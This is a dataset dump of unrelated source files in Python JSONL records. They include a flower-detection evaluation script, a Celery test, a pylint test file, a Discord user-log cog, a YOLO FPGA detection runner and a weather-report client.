model.get_weights()\n\n#fid = open('./result/model_2class_dat.pickle','rb')\nfid = open('../result/model_2class_dim_keras.pickle','rb')\nmodel_data = pickle.load(fid)\nfid.close()\nmodel.set_weights(model_data['weights'])\n\ndef generate_flower_mask(im):\n H,W,_ = im.shape\n im = misc.imresize(im, (int(H*0.1), int(W*0.1)), interp='lanczos')\n H_resize, W_resize,_ = im.shape\n kernels = (45,55,65,75) \n outputs = np.zeros((4, H, W), dtype='uint8') #4=the number of kernels to try\n \n for index, kernel in enumerate(kernels):\n val_gen1, h_steps1, w_steps1 = utility.get_test_generator_scale(im,stride=5,target_shape=[64,64],window=[kernel,kernel])\n prediction = model.predict_generator(val_gen1,h_steps1*w_steps1)[:,0]\n prediction = np.reshape(prediction, (h_steps1,w_steps1))\n outputs[index] = misc.imresize(prediction, (H,W), interp = 'lanczos')/255\n outputs = np.sum(outputs, axis=0)/4\n outputs = np.clip(outputs, 0, 1).astype(float)\n outputs2={'F':outputs}\n return outputs2\n\n\n\"\"\"\nGenerate box predictions\n\"\"\"\nfilenames = os.listdir('../data/test_orig/')\nfilenames.sort()\n\noutput_mask_path = '../result/Final boxes'\nprob_th=0.1\n\ngt = {'dryas0.JPG': [([0,0,0,0],'X'),([0,0,0,0],'X')]}\noutput = []\nmAP = []\nno_detection = 0\nno_misdetection = 0\nno_false_positive = 0\nno_objects = 0\nno_images = 153\n\nfor idy, f in enumerate(filenames):\n test_filename=f\n test_path='../data/test_orig/'\n test_im = imageio.imread(test_path + test_filename)\n \n #Get annotations\n fid=open('../data/Dryas1_sub_buff_annotation.pickle','rb')\n test_ann = pickle.load(fid)[test_filename]\n fid.close()\n test_annotation1 = make_all_f(test_ann)\n \n #Generate mask with sliding window approach\n start_time = time.time()\n test_mask = generate_flower_mask(test_im)\n end_time = time.time()\n time_dif = end_time - start_time\n # Print the time-usage.\n print(\"Time elapsed: \" + str(timedelta(seconds=int(round(time_dif)))))\n \n misc.imsave(output_mask_path + '/mask_' + test_filename, test_mask['F'])\n \n #Calculate mAP score\n p_th = [0.1*i for i in range(1,10)]\n iou_th = [0.1*i for i in range(1,5)]\n AP = utility.evaluate_ap_score(test_annotation1,test_mask,p_th,iou_th,min_box=minibox,buffer=[x_start,x_stop,y_start,y_stop])\n mAP.append(sum(AP['F'])/len(AP['F']))\n \n #Create bb predictions from the mask\n pred_boxes = utility.generate_box_prediction_nms(test_mask, 'F', threshold=prob_th, minbox=minibox, buffer=[x_start,x_stop,y_start,y_stop])\n \n #Save image with predictions and ground truth\n pic = utility.im_with_boxes(test_annotation1,pred_boxes,test_im,output_mask_path+'/'+test_filename,thickness=25,buffer=[x_start,x_stop,y_start,y_stop])\n \n #Evaluate predictions\n eval_result = utility.evaluate(pred_boxes, test_annotation1)\n no_detection += eval_result[0]\n no_misdetection += eval_result[1]\n no_false_positive += eval_result[2]\n no_objects += eval_result[3]\n \n #Check out the annotation with biggest overlap with predicted box\n #i.e. generating ground truths for the predicted boxes\n iom_scores = utility.generate_iom(pred_boxes, test_annotation1, 'F')\n boxes = []\n for idx, box in enumerate(iom_scores):\n xmin,xmax,ymin,ymax = pred_boxes[idx][0]\n xmin = int(0.1*xmin)\n xmax = int(0.1*xmax)\n ymin = int(0.1*ymin)\n ymax = int(0.1*ymax)\n \n if sum(box)>0.3:\n place = max(enumerate(box), key=lambda x: x[1])[0]\n boxes.append((pred_boxes[idx][0], test_ann[place][-1]))\n output.append(str(idy) + ',' + str(xmin) +',' + str(xmax) + \\\n ',' + str(ymin) + ',' + str(ymax) +',' + \\\n test_ann[place][-1] + '\\n')\n else:\n boxes.append((pred_boxes[idx][0], 'X'))\n output.append(str(idy) + ',' + str(xmin) +',' + str(xmax) + \\\n ',' + str(ymin) + ',' + str(ymax) +',' + \\\n 'X' + '\\n')\n \n gt[test_filename]=boxes\n \n\n\nfid=open('../result/dim2_keras_boxes.pickle','wb')\npickle.dump(gt,fid)\nfid.close()\n\nfid=open('../result/dim2_keras_boxes.txt','w')\nfor row in output:\n fid.write(row)\nfid.close()\n\nstatistics = {'mAP':mAP}\nstatistics['no_detection']=no_detection\nstatistics['no_misdetection']=no_misdetection\nstatistics['no_false_positive']=no_false_positive\nstatistics['no_objects']=no_objects\nstatistics['no_images']=no_images\nstatistics['miss_rate']=no_misdetection/float(no_objects)\nstatistics['FPPI']=no_false_positive/float(no_images)\n\nfid=open('../results/dim2_keras_statistics.pickle','wb')\npickle.dump(statistics,fid)\nfid.close()\n","sub_path":"Training models/predict_bounding_boxes.py","file_name":"predict_bounding_boxes.py","file_ext":"py","file_size_in_byte":7287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"182926749","text":"from celery_daemon_task.core.task import DaemonTask\n\nimport datetime\nimport time\n\n\n__author__ = 'nick'\n\n\nclass MockDaemonTask(DaemonTask):\n\ttask_loop_delay = datetime.timedelta(seconds=2)\n\tmax_iterations = 2\n\n\tnum_executions = 0\n\n\tdef task(self, *args, **kwargs):\n\t\tself.logger.info('Running task')\n\t\tself.num_executions += 1\n\n\ndef test_daemon_start():\n\t\"\"\"Tests that a basic daemon task can be started asynchronously\"\"\"\n\ttask = MockDaemonTask()\n\n\tstart_time = time.time()\n\n\ttask.start().join()\n\n\tassert time.time() - start_time >= task.max_iterations * task.task_loop_delay.total_seconds()\n\tassert task.num_executions == task.max_iterations\n\ndef test_daemon_run_daemon():\n\t\"\"\"Tests that a basic daemon task can run in the foreground\"\"\"\n\ttask = MockDaemonTask()\n\n\tstart_time = time.time()\n\n\ttask._run_daemon()\n\n\tassert time.time() - start_time >= task.max_iterations * task.task_loop_delay.total_seconds()\n\tassert task.num_executions == task.max_iterations","sub_path":"tests/task_tests.py","file_name":"task_tests.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"625249815","text":"#pylint: disable=missing-docstring, no-else-return, invalid-name, unused-variable, superfluous-parens, try-except-raise\n\"\"\"Testing inconsistent returns\"\"\"\nimport math\nimport sys\n\n# These ones are consistent\ndef explicit_returns(var):\n if var >= 0:\n return math.sqrt(var)\n else:\n return None\n\ndef explicit_returns2(var):\n if var < 0:\n return None\n return math.sqrt(var)\n\ndef empty_implicit_returns(var):\n if var < 0:\n return\n\ndef returns_in_exceptions():\n try:\n raise ValueError('test')\n except ValueError:\n return 1\n except (OSError, TypeError):\n return 2\n\ndef returns_and_exceptions(var):\n if var < 10:\n return var**2\n else:\n raise ValueError(\"Incorrect value\")\n\ndef returns_and_exceptions_issue1770(var):\n try:\n if var == 1:\n return 'a'\n elif var == 2:\n return 'b'\n else:\n raise ValueError\n except AssertionError:\n return None\n\ndef explicit_returns3(arg):\n if arg:\n return False\n else:\n if arg < 3:\n print('arg < 3')\n return True\n\ndef explicit_returns4(arg):\n if arg:\n if arg > 2:\n print('arg > 2')\n return False\n else:\n if arg < 3:\n print('arg < 3')\n return True\n\ndef explicit_returns5(arg):\n if arg:\n if arg > 2:\n print('arg > 2')\n return False\n else:\n return True\n\ndef nested_function():\n def dummy_return():\n return True\n return dummy_return\n\ndef explicit_returns6(x, y, z):\n if x: # pylint: disable=no-else-return\n a = 1\n if y: # pylint: disable=no-else-return\n b = 2\n return y\n else:\n c = 3\n return x\n else:\n d = 4\n return z\n\ndef explicit_returns7(arg):\n if arg < 0:\n arg = 2 * arg\n return 'below 0'\n elif arg == 0:\n print(\"Null arg\")\n return '0'\n else:\n arg = 3 * arg\n return 'above 0'\n\ndef bug_1772():\n \"\"\"Don't check inconsistent return statements inside while loop\"\"\"\n counter = 1\n while True:\n counter += 1\n if counter == 100:\n return 7\n\ndef bug_1771(var):\n if var == 1:\n sys.exit(1)\n else:\n return var * 2\n\ndef bug_1771_with_user_config(var):\n # sys.getdefaultencoding is considered as a never\n # returning function in the inconsistent_returns.rc file.\n if var == 1:\n sys.getdefaultencoding()\n else:\n return var * 2\n\ndef bug_1794_inner_func_in_if(var):\n # pylint: disable = no-else-return,useless-return\n if var:\n def _inner():\n return None\n return None\n else:\n return None\n\ntry:\n import ConfigParser as configparser\nexcept ImportError:\n import configparser\n\n# Due to the try/except import above, astroid cannot safely\n# infer the exception type. It doesn't matter here, because\n# as the raise statement is not inside a try/except one, there\n# is no need to infer the exception type. It is just an exception\n# that is raised.\ndef bug_1794(a):\n for x in range(a):\n if x == 100:\n return a\n raise configparser.NoSectionError('toto')\n\n#pylint: disable = no-else-return\ndef bug_1782_bis(val=3):\n if val == 3:\n while True:\n break\n return True\n else:\n raise RuntimeError()\n\n# Next ones are not consistent\ndef explicit_implicit_returns(var): # [inconsistent-return-statements]\n if var >= 0:\n return math.sqrt(var)\n\ndef empty_explicit_returns(var): # [inconsistent-return-statements]\n if var < 0:\n return\n return math.sqrt(var)\n\ndef explicit_implicit_returns2(arg): # [inconsistent-return-statements]\n if arg:\n if arg > 2:\n print('arg > 2')\n return False\n else:\n return True\n\ndef explicit_implicit_returns3(arg): # [inconsistent-return-statements]\n if arg:\n if arg > 2:\n print('arg > 2')\n return False\n else:\n return True\n\ndef returns_missing_in_catched_exceptions(arg): # [inconsistent-return-statements]\n try:\n arg = arg**2\n raise ValueError('test')\n except ValueError:\n print('ValueError')\n arg = 0\n except (OSError, TypeError):\n return 2\n\ndef complex_func(arg): # [inconsistent-return-statements]\n for i in range(arg):\n if i > arg / 2:\n break\n else:\n return arg\n\ndef inconsistent_returns_in_nested_function():\n def not_consistent_returns_inner(arg): # [inconsistent-return-statements]\n for i in range(arg):\n if i > arg / 2:\n break\n else:\n return arg\n return not_consistent_returns_inner\n\ndef bug_1771_counter_example(var): # [inconsistent-return-statements]\n if var == 1:\n inconsistent_returns_in_nested_function()\n else:\n return var * 2\n\nclass BlargException(Exception):\n pass\n\n\ndef blarg(someval):\n try:\n if someval:\n raise BlargException()\n return 5\n except BlargException:\n raise\n\ndef bug_1772_counter_example(): # [inconsistent-return-statements]\n counter = 1\n if counter == 1:\n while True:\n counter += 1\n if counter == 100:\n return 7\n\ndef bug_1794_inner_func_in_if_counter_example_1(var): # [inconsistent-return-statements]\n # pylint: disable = no-else-return,useless-return\n if var:\n def _inner():\n return None\n return None\n else:\n return\n\ndef bug_1794_inner_func_in_if_counter_example_2(var): # [inconsistent-return-statements]\n # pylint: disable = no-else-return,useless-return\n if var:\n def _inner():\n return\n return None\n else:\n return\n\ndef bug_1794_inner_func_in_if_counter_example_3(var): # [inconsistent-return-statements]\n # pylint: disable = no-else-return,useless-return\n if var:\n def _inner():\n return None\n return None\n else:\n def _inner2(var_bis): # [inconsistent-return-statements]\n if var_bis:\n return True\n return\n","sub_path":".venv/lib/python3.7/site-packages/pylint/test/functional/inconsistent_returns.py","file_name":"inconsistent_returns.py","file_ext":"py","file_size_in_byte":6212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"505825074","text":"from typing import List\n\nfrom apistar import App, Route, TestClient, schema\n\n\nclass KittenName(schema.String):\n max_length = 100\n\n\nclass KittenColor(schema.Enum):\n enum = [\n 'black',\n 'brown',\n 'white',\n 'grey',\n 'tabby'\n ]\n\n\nclass Kitten(schema.Object):\n properties = {\n 'name': KittenName,\n 'color': KittenColor,\n 'cuteness': schema.Number(\n minimum=0.0,\n maximum=10.0,\n multiple_of=0.1\n )\n }\n\n\ndef list_favorite_kittens(color: KittenColor) -> List[Kitten]:\n \"\"\"\n List your favorite kittens, optionally filtered by color.\n \"\"\"\n kittens = [\n Kitten({'name': 'fluffums', 'color': 'white', 'cuteness': 9.8}),\n Kitten({'name': 'tabitha', 'color': 'tabby', 'cuteness': 8.7}),\n Kitten({'name': 'meowster', 'color': 'white', 'cuteness': 7.8}),\n Kitten({'name': 'fuzzball', 'color': 'brown', 'cuteness': 8.0}),\n ]\n return [\n kitten for kitten in kittens\n if kitten['color'] == color\n ]\n\n\ndef add_favorite_kitten(name: KittenName) -> Kitten:\n \"\"\"\n Add a kitten to your favorites list.\n \"\"\"\n return Kitten({'name': name, 'color': 'black', 'cuteness': 0.0})\n\n\napp = App(routes=[\n Route('/list_favorite_kittens/', 'GET', list_favorite_kittens),\n Route('/add_favorite_kitten/', 'POST', add_favorite_kitten),\n])\n\n\nclient = TestClient(app)\n\n\ndef test_list_kittens():\n response = client.get('/list_favorite_kittens/?color=white')\n assert response.status_code == 200\n assert response.json() == [\n {'name': 'fluffums', 'color': 'white', 'cuteness': 9.8},\n {'name': 'meowster', 'color': 'white', 'cuteness': 7.8}\n ]\n\n\ndef test_add_kitten():\n response = client.post('/add_favorite_kitten/', data={'name': 'charlie'})\n assert response.status_code == 200\n assert response.json() == {\n 'name': 'charlie', 'color': 'black', 'cuteness': 0.0\n }\n\n\ndef test_invalid_list_kittens():\n response = client.get('/list_favorite_kittens/?color=invalid')\n assert response.status_code == 400\n assert response.json() == {\n 'color': 'Must be a valid choice.'\n }\n","sub_path":"tests/schema/test_schema.py","file_name":"test_schema.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"224009734","text":"#-------------------------------------------------------------------------------\n# Name: module1\n# Purpose:\n#\n# Author: pbarkley\n#\n# Created: 26/03/2015\n# Copyright: (c) pbarkley 2015\n# Licence: \n#-------------------------------------------------------------------------------\nfrom Sniv import Sniv\n#from Schedule import Schedule\nfrom datetime import timedelta\n\n\nclass Wave(object):\n\n def __init__(self, id):\n self.id = id\n self.begin = None #a datetime giving the date and time for the start of the wave\n self.end = None\n self.priority = 1.0\n self.times = {}\n self.times[\"Plane\"] = Sniv()\n self.times[\"Flyer\"] = Sniv()\n self.times[\"Student\"] = self.times[\"Flyer\"]\n self.times[\"Instructor\"] = self.times[\"Flyer\"]\n self.studentMultiple = 1 #Allows double or triple waves\n self.schedule = None\n self.night_time = 0.0 # Hours of night in wave (float)\n self.day_time = 0.0 # Hours of day in wave (float)\n self._canFollow = []\n \"\"\" self._canFollow includes itself, so for an out-and-in the student can have\n sequential events that can follow immediately both in the same wave\"\"\"\n self._canFollowCalculated = False\n self.crewRestHours = 12 #Max time between first brief and last debrief\n self.tags = set()\n self._tier = None\n self.fudge = 0.0\n\n def __str__(self):\n return \"Wave_\" + str(self.id)\n\n # Returns the set of waves that a student could be scheduled for and still make this one\n def canImmediatelyFollow(self):\n sked = self.schedule\n if sked != None and not self._canFollowCalculated:\n for w in sked.waves:\n wave = sked.waves[w]\n if (wave.times[\"Flyer\"].end <= self.times[\"Flyer\"].begin):\n self._canFollow.append(w)\n self._canFollowCalculated = True\n return self._canFollow\n\n def first(self):\n self.canImmediatelyFollow()\n if len(self._canFollow) > 0:\n return False\n else:\n return True\n\n def planeHours(self):\n diff = self.times[\"Plane\"].end - self.times[\"Plane\"].begin\n h = diff.seconds/3600.0\n \"\"\"if h >= 2.0:\n fudge = 0.2\"\"\"\n return h - self.fudge\n\n # Future work: fix canImmediatelyFollow to return min(tier + 1) across any events it can follow else 0\n def tier(self):\n if self._tier is None:\n possible_tiers = []\n for w in self.schedule.waves.values():\n if w.times[\"Flyer\"].end <= self.times[\"Flyer\"].begin:\n possible_tiers.append(w.tier() + 1)\n if possible_tiers:\n self._tier = min(possible_tiers)\n else:\n self._tier = 0\n return self._tier\n\n\n\ndef main():\n pass\n\nif __name__ == '__main__':\n main()\n","sub_path":"Wave.py","file_name":"Wave.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"621397053","text":"liste = []\ndef countRank(scores, i):\n count = 0\n rank = 0\n for j in scores:\n if j not in liste:\n liste.append(j)\n count += 1\n if j == i:\n rank = count\n liste.clear()\n return rank\n\n\ndef climbingLeaderboard(scores, alice):\n total_ranks = []\n for i in alice:\n scores.append(i)\n scores.sort(reverse=True)\n count_of_rank = countRank(scores, i)\n total_ranks.append(str(count_of_rank))\n scores.remove(i)\n\n total_ranks = '\\n'.join(total_ranks)\n return print(total_ranks)\n\n\nscores_count = int(input('ScoresCount:'))\n\nscores = list(map(int, input('Scores: ').rstrip().split()))\n\nalice_count = int(input('AliceCount: '))\n\nalice = list(map(int, input('AliceScores: ').rstrip().split()))\n\nresult = climbingLeaderboard(scores, alice)\n\n\n\n","sub_path":"Odev3.py","file_name":"Odev3.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"321818876","text":"from datetime import datetime\nfrom os import system, chdir\n\n#start_time = datetime.now() \nnow = datetime.now()\nnow = str(now.year) +'-'+ f\"{now.month:02d}\" +'-'+ f\"{now.day:02d}\"\n# print(now)\nchdir('/home/opc/BCBCSVStorage/Warframe')\n# print('python WarframeScripts.py')\nsystem('python3 WarframeScripts.py')\n#print ('WarframeCSVtoTSV.py')\nsystem('python3 WarframeCSVtoTSV.py')\n# print('git add *')\nsystem('git add *')\n# print(\"git commit -m 'now'\")\nsystem('git commit -m \"' + now + '\"')\n# print('git push')\nsystem('git push')\n#end_time = datetime.now()\n#with open(\"execution.log\", \"w\") as text_file:\n# text_file.write('Duration: {}'.format(end_time - start_time))\n","sub_path":"Warframe/WarframeGitScriptsOracle.py","file_name":"WarframeGitScriptsOracle.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"285765675","text":"import datetime\nimport discord\n\nfrom redbot.core import checks, commands, Config\n\nfrom redbot.core.bot import Red\n\n__author__ = \"saurichable\"\n\n\nclass UserLog(commands.Cog):\n \"\"\"Log when users join/leave into your specified channel.\"\"\"\n\n __author__ = \"saurichable\"\n __version__ = \"1.0.3\"\n\n def __init__(self, bot: Red):\n self.bot = bot\n self.config = Config.get_conf(\n self, identifier=56546565165465456, force_registration=True\n )\n\n self.config.register_guild(channel=None, join=True, leave=True)\n\n @commands.group(autohelp=True)\n @commands.guild_only()\n @checks.admin_or_permissions(manage_guild=True)\n async def userlog(self, ctx):\n \"\"\"Manage user log settings.\"\"\"\n pass\n\n @userlog.command(name=\"channel\")\n async def user_channel_log(self, ctx, channel: discord.TextChannel = None):\n \"\"\"Set the channel for logs.\n\n If the channel is not provided, logging will be disabled.\"\"\"\n if channel:\n await self.config.guild(ctx.guild).channel.set(channel.id)\n else:\n await self.config.guild(ctx.guild).channel.set(None)\n await ctx.tick()\n\n @userlog.command(name=\"join\")\n async def user_join_log(self, ctx: commands.Context, on_off: bool = None):\n \"\"\"Toggle logging when users join the current server. \n\n If `on_off` is not provided, the state will be flipped.\"\"\"\n target_state = (\n on_off\n if on_off\n else not (await self.config.guild(ctx.guild).join())\n )\n await self.config.guild(ctx.guild).join.set(target_state)\n if target_state:\n await ctx.send(\"Logging users joining is now enabled.\")\n else:\n await ctx.send(\"Logging users joining is now disabled.\")\n\n @userlog.command(name=\"leave\")\n async def user_leave_log(self, ctx: commands.Context, on_off: bool = None):\n \"\"\"Toggle logging when users leave the current server.\n\n If `on_off` is not provided, the state will be flipped.\"\"\"\n target_state = (\n on_off\n if on_off\n else not (await self.config.guild(ctx.guild).leave())\n )\n await self.config.guild(ctx.guild).leave.set(target_state)\n if target_state:\n await ctx.send(\"Logging users leaving is now enabled.\")\n else:\n await ctx.send(\"Logging users leaving is now disabled.\")\n\n @commands.Cog.listener()\n async def on_member_join(self, member):\n join = await self.config.guild(member.guild).join()\n if not join:\n return\n channel = member.guild.get_channel(await self.config.guild(member.guild).channel())\n if not channel:\n return\n time = datetime.datetime.utcnow()\n users = len(member.guild.members)\n since_created = (time - member.created_at).days\n user_created = member.created_at.strftime(\"%Y-%m-%d, %H:%M\")\n\n created_on = f\"{user_created} ({since_created} days ago)\"\n\n embed = discord.Embed(\n description=f\"{member.mention} ({member.name}#{member.discriminator})\",\n colour=discord.Colour.green(),\n timestamp=member.joined_at,\n )\n embed.add_field(name=\"Total Users:\", value=str(users))\n embed.add_field(name=\"Account created on:\", value=created_on)\n embed.set_footer(text=f\"User ID: {member.id}\")\n embed.set_author(\n name=f\"{member.name} has joined the guild\",\n url=member.avatar_url,\n icon_url=member.avatar_url,\n )\n embed.set_thumbnail(url=member.avatar_url)\n await channel.send(embed=embed)\n\n @commands.Cog.listener()\n async def on_member_remove(self, member):\n leave = await self.config.guild(member.guild).leave()\n if not leave:\n return\n channel = member.guild.get_channel(await self.config.guild(member.guild).channel())\n if not channel:\n return\n time = datetime.datetime.utcnow()\n users = len(member.guild.members)\n embed = discord.Embed(\n description=f\"{member.mention} ({member.name}#{member.discriminator})\",\n colour=discord.Colour.red(),\n timestamp=time,\n )\n embed.add_field(name=\"Total Users:\", value=str(users))\n embed.set_footer(text=f\"User ID: {member.id}\")\n embed.set_author(\n name=f\"{member.name} has left the guild\",\n url=member.avatar_url,\n icon_url=member.avatar_url,\n )\n embed.set_thumbnail(url=member.avatar_url)\n await channel.send(embed=embed)\n","sub_path":"userlog/userlog.py","file_name":"userlog.py","file_ext":"py","file_size_in_byte":4636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"283890565","text":"if __name__ == \"__main__\":\r\n\r\n #Importing some libraries\r\n import numpy as np\r\n import pandas as pd\r\n import os\r\n #Getting rid of pesky warnings\r\n def warn(*args, **kwargs):\r\n pass\r\n import warnings\r\n warnings.warn = warn\r\n np.warnings.filterwarnings('ignore')\r\n\r\n column_names = [\r\n \t\"Age\",\r\n\t\t\"BusinessTravel\",\t\r\n\t\t\"Department\",\r\n\t\t\"DistanceFromHome\",\r\n\t\t\"Education\",\r\n\t\t\"EnvironmentSatisfaction\",\r\n\t\t\"Gender\",\r\n\t\t\"JobInvolvement\",\r\n\t\t\"JobLevel\",\r\n\t\t\"JobRole\",\r\n\t\t\"JobSatisfaction\",\r\n\t\t\"MaritalStatus\",\r\n\t\t\"MonthlyIncome\",\r\n\t\t\"NumCompaniesWorked\",\r\n\t\t\"OverTime\",\r\n\t\t\"PercentSalaryHike\",\r\n\t\t\"PerformanceRating\",\r\n\t\t\"StockOptionLevel\",\r\n\t\t\"TotalWorkingYears\",\r\n\t\t\"TrainingTimesLastYear\",\r\n\t\t\"WorkLifeBalance\",\r\n\t\t\"YearsAtCompany\",\r\n\t\t\"YearsInCurrentRole\",\r\n\t\t\"YearsSinceLastPromotion\",\r\n\t\t\"YearsWithCurrManager\"\r\n ]\r\n #Importing the dataset\r\n location = 'final.csv'\r\n dataset = pd.read_csv(location)\r\n dataset = dataset.drop(['Unnamed: 0'],axis=1)\r\n X=dataset.iloc[:,dataset.columns !='Attrition']\r\n Y=dataset.iloc[:,dataset.columns =='Attrition']\r\n \r\n #Feature scaling\r\n from sklearn.preprocessing import StandardScaler\r\n sc_X = StandardScaler()\r\n X_train = sc_X.fit_transform(X)\r\n \r\n\r\n #Using Pipeline\r\n import sklearn.pipeline\r\n \r\n from sklearn.ensemble import RandomForestClassifier\r\n from sklearn.decomposition import KernelPCA\r\n from imblearn.pipeline import make_pipeline\r\n \r\n \r\n clf = RandomForestClassifier()\r\n kernel = KernelPCA()\r\n \r\n pipeline = make_pipeline(kernel, clf)\r\n pipeline.fit(X,Y)\r\n\r\n #User-input\r\n v = []\r\n for i in column_names[:]:\r\n v.append(input(i+\": \"))\r\n answer = np.array(v)\r\n answer = answer.reshape(1,-1)\r\n answer = sc_X.transform(answer)\r\n print (\"Predicts:\"+ str(pipeline.predict(answer)))\r\n \r\n","sub_path":"Prediction.py","file_name":"Prediction.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"52166788","text":"#!/usr/bin/env python\n# Copyright 2019 Xilinx Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\nimport os, sys\nfrom six import itervalues, iteritems\nfrom ctypes import *\nimport numpy as np\nimport timeit\n\nfrom vai.dpuv1.rt import xdnn, xdnn_io\nfrom vai.dpuv1.rt.vitis.python.dpu.runner import Runner\nfrom vai.dpuv1.utils.postproc import yolo\nfrom yolo_utils import bias_selector, saveDetectionDarknetStyle, yolo_parser_args\nfrom yolo_utils import draw_boxes, generate_colors\nfrom get_mAP_darknet import calc_detector_mAP\n\ndef main():\n parser = xdnn_io.default_parser_args()\n parser = yolo_parser_args(parser)\n args = parser.parse_args()\n args = xdnn_io.make_dict_args(args)\n\n # Setup the environment\n img_paths = xdnn_io.getFilePaths(args['images'])\n if(args['golden'] or args['visualize']):\n assert args['labels'], \"Provide --labels to compute mAP.\"\n assert args['results_dir'], \"For accuracy measurements, provide --results_dir to save the detections.\"\n labels = xdnn_io.get_labels(args['labels'])\n colors = generate_colors(len(labels))\n\n if args['yolo_version'] == 'v2': yolo_postproc = yolo.yolov2_postproc\n elif args['yolo_version'] == 'v3': yolo_postproc = yolo.yolov3_postproc\n\n runner = Runner(args['vitis_rundir'])\n\n # Setup the blobs\n inTensors = runner.get_input_tensors()\n outTensors = runner.get_output_tensors()\n batch_sz = args['batch_sz']\n if batch_sz == -1:\n batch_sz = inTensors[0].dims[0]\n\n fpgaBlobs = []\n for io in [inTensors, outTensors]:\n blobs = []\n for t in io:\n shape = (batch_sz,) + tuple([t.dims[i] for i in range(t.ndims)][1:])\n blobs.append(np.empty((shape), dtype=np.float32, order='C'))\n fpgaBlobs.append(blobs)\n fpgaInput = fpgaBlobs[0][0]\n\n # Setup the YOLO config\n net_h, net_w = fpgaInput.shape[-2:]\n args['net_h'] = net_h\n args['net_w'] = net_w\n biases = bias_selector(args)\n\n # Setup profiling env\n prep_time = 0\n exec_time = 0\n post_time = 0\n\n # Start the execution\n for i in range(0, len(img_paths), batch_sz):\n pl = []\n img_shapes = []\n\n # Prep images\n t1 = timeit.default_timer()\n for j, p in enumerate(img_paths[i:i + batch_sz]):\n fpgaInput[j, ...], img_shape = xdnn_io.loadYoloImageBlobFromFile(p, net_h, net_w)\n pl.append(p)\n img_shapes.append(img_shape)\n t2 = timeit.default_timer()\n\n # Execute\n jid = runner.execute_async(fpgaBlobs[0], fpgaBlobs[1])\n runner.wait(jid)\n\n # Post Proc\n t3 = timeit.default_timer()\n boxes = yolo_postproc(fpgaBlobs[1], args, img_shapes, biases=biases)\n t4 = timeit.default_timer()\n\n prep_time += (t2-t1)\n exec_time += (t3-t2)\n post_time += (t4-t3)\n\n for i in range(min(batch_sz, len(img_shapes))):\n print(\"Detected {} boxes in {}\".format(len(boxes[i]), pl[i]))\n\n # Save the result\n if(args['results_dir']):\n for i in range(min(batch_sz, len(img_shapes))):\n filename = os.path.splitext(os.path.basename(pl[i]))[0]\n out_file_txt = os.path.join(args['results_dir'], filename + '.txt')\n print(\"Saving {} boxes to {}\".format(len(boxes[i]), out_file_txt)); sys.stdout.flush()\n saveDetectionDarknetStyle(out_file_txt, boxes[i], img_shapes[i])\n if(args['visualize']):\n out_file_png = os.path.join(args['results_dir'], filename + '.png')\n print(\"Saving result to {}\".format(out_file_png)); sys.stdout.flush()\n draw_boxes(pl[i], boxes[i], labels, colors, out_file_png)\n\n # Profiling results\n if(args['profile']):\n print(\"\\nAverage Latency in ms:\")\n print(\" Image Prep: {0:3f}\".format(prep_time * 1000.0 / len(img_paths)))\n print(\" Exec: {0:3f}\".format(exec_time * 1000.0 / len(img_paths)))\n print(\" Post Proc: {0:3f}\".format(post_time * 1000.0 / len(img_paths)))\n sys.stdout.flush()\n\n # mAP calculation\n if(args['golden']):\n print()\n print(\"Computing mAP score : \")\n print(\"Class names are : {} \".format(labels))\n mAP = calc_detector_mAP(args['results_dir'], args['golden'], len(labels), labels, args['prob_threshold'], args['mapiouthresh'], args['points'])\n sys.stdout.flush()\n\nif __name__ == '__main__':\n main()\n","sub_path":"proj/fpga/zcu106/Vitis-AI-DPU_TRD-for-ZCU106/zcu106_dpu/Vitis-AI/alveo/apps/yolo/test_detect_vitis.py","file_name":"test_detect_vitis.py","file_ext":"py","file_size_in_byte":4668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"221903883","text":"import requests\n\n\ndef main():\n choice = input(\"[R]eport weather or [s]ee reports? \")\n while choice:\n if choice.lower().strip() == 'r':\n report_event()\n elif choice.lower().strip() == 's':\n see_events()\n else:\n print(f\"Don't know what to do with {choice}.\")\n\n choice = input(\"[R]eport weather or [s]ee reports? \")\n\n\ndef report_event():\n desc = input(\"What is happening now? \")\n city = input(\"What city? \")\n\n data = {\n \"description\": desc,\n \"location\": {\n \"city\": city\n }\n }\n\n url = \"http://127.0.0.1:8000/api/reports\"\n resp = requests.post(url, json=data)\n resp.raise_for_status()\n\n result = resp.json()\n print(f\"Reported new event: {result.get('id')}\")\n\n\ndef see_events():\n url = \"http://127.0.0.1:8000/api/reports\"\n resp = requests.get(url)\n resp.raise_for_status()\n\n data = resp.json()\n for r in data:\n print(f\"{r.get('location').get('city')} has {r.get('description')}\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"part_1_Basics/06_deployment/bin/reportapp.py","file_name":"reportapp.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"511452654","text":"#!/usr/bin/env python3\n# Copyright (c) 2004-present Facebook All rights reserved.\n# Use of 